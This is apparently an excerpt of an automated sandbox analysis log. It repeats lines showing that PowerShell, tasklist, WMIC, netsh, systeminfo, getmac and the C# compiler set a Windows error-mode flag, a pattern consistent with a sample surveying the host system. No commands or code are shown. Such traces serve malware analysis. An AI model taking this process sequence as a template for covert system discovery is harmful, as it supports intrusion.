Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
